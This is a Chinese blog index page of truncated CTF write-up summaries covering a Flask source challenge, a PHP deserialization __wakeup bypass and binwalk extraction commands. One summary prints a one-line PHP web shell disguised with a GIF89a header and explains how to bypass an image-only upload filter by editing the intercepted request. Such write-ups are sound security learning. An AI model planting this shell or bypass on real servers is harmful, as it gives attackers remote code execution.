摘要: 打开之后 看源码 import flask import os app = flask.Flask(__name__) app.config['FLAG'] = os.environ.pop('FLAG') @app.route('/') def index(): return open(__fil 阅读全文
posted @ 2020-10-24 17:03 夜布多 阅读(491) 评论(0) 推荐(0) 编辑
摘要: 进去之后让上传东西,想上传一个一句话木马,发现只让上传图片格式的,并有前端过滤 那我们把一句话写到一个文本文件里,再把后缀名改为jpg GIF89a <script language="php">eval($_POST['shell']);</script> 上传,bp拦截包,改包,将后缀名由jpg 阅读全文
posted @ 2020-10-24 16:38 夜布多 阅读(120) 评论(0) 推荐(0) 编辑
摘要: class xctf{ public $flag = '111'; public function __wakeup(){ exit('bad requests'); } ?code= 注意到了_wakeup(),如果需要反序列化的时候,php才会调用_wakeup()。所以我们需要利用反序列化。 阅读全文
posted @ 2020-10-24 16:09 夜布多 阅读(699) 评论(0) 推荐(0) 编辑
摘要: binwalk常用命令之提取binwalk出的隐藏文件 -e 分解出压缩包 binwalk -e pcat.bin //要分解的文件名 -D或者–dd 分解某种类型的文件(在windows里要用双引号括起来) binwalk -D=jpeg/*文件类型*/ pcat.bin //要分解的文件名 -M 阅读全文
posted @ 2020-10-24 00:29 夜布多 阅读(1193) 评论(0) 推荐(0) 编辑